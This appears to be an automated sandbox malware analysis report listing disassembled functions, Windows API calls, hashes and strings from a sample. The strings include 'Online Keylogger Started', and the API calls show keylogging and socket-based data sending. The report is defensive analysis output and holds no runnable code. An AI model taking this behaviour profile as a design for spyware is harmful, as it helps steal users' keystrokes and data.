                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                        • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                        • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                        • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                        Function 0044FEE3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
                                        • __alloca_probe_16.LIBCMT ref: 0044FF68
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
                                        • __freea.LIBCMT ref: 0044FFD4
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 313313983-0
                                        • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                        • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                        • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                        • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                        Function 0044E14B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                        • _free.LIBCMT ref: 0044E1B0
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                        • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                        • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                        • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                        Function 00446F53 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445369,00440AAB,00000000,?,?,?,?,00440C8E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F58
                                        • _free.LIBCMT ref: 00446F8D
                                        • _free.LIBCMT ref: 00446FB4
                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FC1
                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FCA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                        • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                        • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                        • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                        Function 0041B38D Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                        • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3D8
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseHandleOpen$FileImageName
                                        • String ID:
                                        • API String ID: 2951400881-0
                                        • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                        • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                        • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                        • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                        Function 0044F7AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0044F7C5
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 0044F7D7
                                        • _free.LIBCMT ref: 0044F7E9
                                        • _free.LIBCMT ref: 0044F7FB
                                        • _free.LIBCMT ref: 0044F80D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                        • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                        • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                        • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                        Function 004432F7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00443315
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 00443327
                                        • _free.LIBCMT ref: 0044333A
                                        • _free.LIBCMT ref: 0044334B
                                        • _free.LIBCMT ref: 0044335C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                        • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                        • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                        • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                        Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                        • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                        • IsWindowVisible.USER32(?), ref: 004167A1
                                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessWindow$Open$TextThreadVisible
                                        • String ID: (FG
                                        • API String ID: 3142014140-2273637114
                                        • Opcode ID: 9c79950384effebaea9bf5315d724d682c4e552b57ef82da1617336c4fbf6aa3
                                        • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                        • Opcode Fuzzy Hash: 9c79950384effebaea9bf5315d724d682c4e552b57ef82da1617336c4fbf6aa3
                                        • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                        Function 0044D469 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strpbrk.LIBCMT ref: 0044D4B8
                                        • _free.LIBCMT ref: 0044D5D5
                                          • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00000000,0000000A,0000000A,00000000,0041AD77,00000022,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                                          • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A888
                                          • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000), ref: 0043A88F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                        • String ID: *?$.
                                        • API String ID: 2812119850-3972193922
                                        • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                        • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                                        • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                        • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                                        Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                          • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                        • String ID: XCG$`AG$>G
                                        • API String ID: 2334542088-2372832151
                                        • Opcode ID: 00ea031b35fe0dcf3e6aee1b05692aa2f53a6727008682770bd88c291a01c214
                                        • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                        • Opcode Fuzzy Hash: 00ea031b35fe0dcf3e6aee1b05692aa2f53a6727008682770bd88c291a01c214
                                        • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                        Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • WaitForSingleObject.KERNEL32(00000328,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                        • SetEvent.KERNEL32(00000328,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventObjectSingleWaitsend
                                        • String ID: LAL
                                        • API String ID: 3963590051-3302426157
                                        • Opcode ID: 889e258d40d688e8ee903db4c56f8f2297e8d08d484f71769d69523f674e6bf6
                                        • Instruction ID: 8f6f307dcfa5e25975ae7096dc57d747427bb4b25c3784bf73346896dbb4b4c1
                                        • Opcode Fuzzy Hash: 889e258d40d688e8ee903db4c56f8f2297e8d08d484f71769d69523f674e6bf6
                                        • Instruction Fuzzy Hash: B82123B29001196BCF04ABA5DC96DEE777CBF54358B00413EF916B21E1EA78AA04D6A4
                                        Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                        • String ID: /sort "Visit Time" /stext "$8>G
                                        • API String ID: 368326130-2663660666
                                        • Opcode ID: 247849771554e330f4c56d3a549adbf02a50afc28c9a0bb45716f413473523db
                                        • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                        • Opcode Fuzzy Hash: 247849771554e330f4c56d3a549adbf02a50afc28c9a0bb45716f413473523db
                                        • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                        Function 0040A876 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                        • wsprintfW.USER32 ref: 0040A905
                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventLocalTimewsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                        • API String ID: 1497725170-1359877963
                                        • Opcode ID: f1131f2c5aa9efe0aa35bfe1aadc190762ac6710f9a6fccd412707abd6ba0ca2
                                        • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                        • Opcode Fuzzy Hash: f1131f2c5aa9efe0aa35bfe1aadc190762ac6710f9a6fccd412707abd6ba0ca2
                                        • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                        Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                        • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$LocalTime$wsprintf
                                        • String ID: Online Keylogger Started
                                        • API String ID: 112202259-1258561607
                                        • Opcode ID: 35bc90d2576dbeac95018a630539701253067ab5c51327a8f4703c5e34731f69
                                        • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                        • Opcode Fuzzy Hash: 35bc90d2576dbeac95018a630539701253067ab5c51327a8f4703c5e34731f69
                                        • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                        Function 0044AA83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                        • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                        • __dosmaperr.LIBCMT ref: 0044AB0E
